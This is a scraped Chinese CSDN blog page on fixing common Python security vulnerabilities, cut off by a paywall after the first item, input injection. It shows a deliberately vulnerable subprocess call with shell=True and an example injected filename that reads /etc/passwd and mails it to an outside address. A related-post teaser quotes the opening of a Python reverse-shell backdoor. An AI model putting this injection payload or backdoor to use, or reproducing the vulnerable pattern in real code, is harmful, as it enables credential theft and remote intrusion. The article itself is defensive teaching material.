10个常见安全漏洞的Python解决方法

最新推荐文章于 2024-04-18 07:00:00 发布
最新推荐文章于 2024-04-18 07:00:00 发布
阅读量1.4k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MOY37RQW1JarN33BgZk/article/details/80809676
版权
本文列举了10个常见的Python安全漏洞,包括输入注入、解析XML、assert语句误用、时序攻击等,并提供了相应的解决方法。例如,使用ORM避免SQL注入,使用defusedxml防止XML解析攻击,使用tempfile模块处理临时文件,避免pickle和yaml.load反序列化风险等。保持Python和其依赖项更新是防止安全问题的关键。
摘要由CSDN通过智能技术生成

关注「实验楼」,每天分享一个项目教程   

用Python给你的项目打满补丁。

正文共:3939 字 

预计阅读时间:10 分钟

1.输入注入

注入攻击非常广泛而且很常见,注入有很多种类。它们可以影响语言,框架和环境。

SQL注入是直接编写SQL查询,而不使用ORM并将字符串文字与变量混合。“Escaping quotes”被认为是一种修复,但事实并非如此。 熟悉SQL注入可能发生在备忘单上的所有复杂方式。

命令注入可以在任何时候使用popen,subprocess,os.system调用一个进程并从变量中获取参数。 当调用本地命令时,有人可能会恶意设置某些值。

看一下这个简单的脚本[credit]。 你可以使用用户提供的文件名称调用子进程:

import subprocess

def transcode_file(request, filename):
command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
subprocess.call(command, shell=True)  # a bad idea!

攻击者将filename的值设置为“; cat / etc / passwd | mail them@domain.com或者其他同样危险的东西。

解决方法:

如果使用的是Web框架附带的实用程序,请对输入进行清理。 除非你有充分的理由,否则不要手动构建SQL查询。 大多数ORM具有内置清理方法。

对于shell,请使用shlex模块正确地转义输入。

最低0.47元/天 解锁文章
实验楼v
关注
Python安全编程:避免常见安全漏洞及防范措施
AI天才研究院
08-11 345
2021年,随着AI领域的火爆、互联网平台的壮大、传统行业的转型升级,企业应用机器学习技术解决了很多问题。然而,在实际生产环境中,仍然存在一些安全风险需要注意,如数据泄露、网络攻击、程序漏洞等。本文将以实际案例出发,深入分析并总结目前已知的“Python安全编程”相关的常见安全漏洞及防范措施,为Python开发者提供一个可行的安全防护策略。静态代码检查工具的使用Python代码安全之依赖包管理文件上传漏洞SQL注入攻击CSRF跨站请求伪造密码散列函数的选择Flask框架安全配置。
python shell怎么换行_我非我同学的python的反弹shell的代码 | 学步园
weixin_39880666的博客
11-25 86
不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python# Python Connect-back Backdoor# Author: wofeiwo # Version: 1.0# Date: July 15th 2006import sysimport osimport socketshell = "/bin/sh"def usage(program...
Python中如何安全地处理用户输入? —— 防止注入和其他安全风险
最新发布
04-18 138
输入验证和过滤:对用户输入进行验证和过滤,确保输入符合预期的格式和内容。使用安全的HTML模板引擎:如果需要在HTML中输出用户输入,应使用安全的HTML模板引擎,如Jinja2,来确保用户输入不会被解释为HTML标签或脚本。使用安全框架和库:使用经过验证和广泛使用的安全框架和库,如Django、Flask-Login和Passlib等,以减少漏洞和安全风险。设置合适的权限和防火墙:确保应用程序的用户只能访问他们需要的资源和功能,并使用防火墙来限制来自用户的不受信任的访问。
浅谈Python Web 安全开发
05-08 1473
1. Web安全基本原理 2. 安全开发实践 3.
关于python安全性的问题
weixin_30840253的博客
11-01 973
收集总结了一下python安全方面的知识点以及近年来的相关漏洞,如果有需要修正或补充的地方,欢迎各位师傅的指出。 常见web漏洞python中的示例。 xss python下的xss其原理跟php是一样的,django近年的例子如下: CVE-2017-12794,此例中通过抛出异常造成xss。 sql注入 一般来说使用django自带的操作数据库api是不会造成...
python打造漏洞补丁缺少检测
weixin_30932215的博客
06-09 360
前言: 当我们进行后渗透的时候,进行提权的时候 要识别被未打补丁的漏洞。来进行提权,从而 拿到管理员权限。 思路: 1.让使用者在cmd中打systeminfo命令。将补丁号 放入一个txt。 2.与list.txt进行对比。没有的则打出来 对漏洞进行区分 代码: import os import optparse import re def main()...
Python中的10个常见安全漏洞修复方法
gaojian5422的博客
02-28 2119
Python中的10个常见安全漏洞修复方法
Python技术安全编程常见问题解决方法.docx
07-30
除了上述措施,还有其他安全编程原则,如使用最新版本的库和框架,及时修复已知的安全漏洞,以及遵循最小权限原则,确保每个组件仅拥有完成其任务所需的最小权限。定期进行代码审计和安全测试也很重要,可以帮助发现...
Python学习漏洞
Tony10010的博客
02-26 270
今天去面试两家公司,且不说结果如何,谈谈今天发现的知识的漏洞。 2个字典怎么取并集? emmm当时回答的比较水,没想到别的方法,然后就说了一个极其笨的方法。 for循环balabala。。。 脑子里这么想的。。 dict1 = {'a': 2, 'c': 3} dict2 = {'a': 3, 'd': 4} union_dict = {} for key in dict1: unio...
python补丁_python模块打补丁
weixin_34732602的博客
02-04 689
先自定义两个模块,然后,我们调用模块时,用打补丁方式,改写mod_1.py模块。为mod_2.py内容;其实这就相当于,在不改动mod_1.py模块的前提下,打上补丁。写这个主要是gevent协程的时候,用到的monkey.patch_all()补丁,其实原理就是这样。mod_1.pymod_2.py第一种方法:调用时实现补丁。defmonkey_patch_module_2():importsy...
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
Python常见安全漏洞修复方法集合!你所不会的这里都有!
weixin_33895695的博客
11-17 474
概述编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL ...
注意!Python中的10个常见安全漏洞修复方法
weixin_34380781的博客
02-27 1003
编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多Python开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入***影响广泛且很常见,注入有很多种类,它们影响所有的语言、...
python渗透工具编写学习笔记:9、web漏洞检测与利用脚本
weixin_49511463的博客
12-24 3562
python编写SQL注入、XXS、CSRF、文件包含、上传漏洞检测与利用脚本以及漏洞防护框架
python去头去尾.strip()函数用法:
weixin_40921238的博客
11-23 1591
参数: chars – 移除字符串头尾指定的字符序列。 返回值: 返回移除字符串头尾指定的字符生成的新字符串。 strip()函数的使用方法: str = "00000003210Runoob01230000000"; print str.strip( '0' ); # 去除首尾字符 0 str2 = " Runoob "; # 去除首尾空格 print str2.strip(); 运行结果: 3210Runoob0123 Runoob 下例演示了只要头尾包含有指定字符序列中的
python open 函数漏洞_input()函数中的Python漏洞
weixin_28943045的博客
03-01 248
在本文中,我们将学习在版本2.x中输入函数如何以不良方式运行。或更早。在2.x版中。raw_input()函数可替换该input()函数。在较新的版本3.x中。或稍后,将两个功能的所有所需特征和功能合并到该input()方法中。首先,让我们看一下在Python 2.x中接受输入的内置函数的输入类型。示例#InputGiven:Stringstr1=raw_input("Outputo...
学习Python,这22个包怎能不掌握?
AI科技大本营
03-26 5098
作者 |Erik-Jan van Baaren译者 |弯月,责编 | 屠敏头图 | CSDN 下载自东方 IC出品 | CSDN(ID:CSDNne...
python资源管理错误漏洞_Python 资源管理错误漏洞|CVE-2019-9674|CNNVD-202002-041|互联网安全漏洞库 | 指尖安全 | 垂直互联网安全媒体...
weixin_28688791的博客
02-21 985
来源:python-security.readthedocs.io链接:https://python-security.readthedocs.io/security.html#archives-and-zip-bomb来源:github.com链接:https://github.com/python/cpython/blob/master/Lib/zipfile.py来源:bugs.python...
Python Django框架下的Web漏洞挖掘技术研究
综上所述,本研究项目提出了一个基于Python和Django框架的Web漏洞挖掘工具的设计与实现方案,通过分析其各个组成部分的功能和实现方式,展示了如何利用这些技术进行有效的安全漏洞探测和分析。本项研究对于理解和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值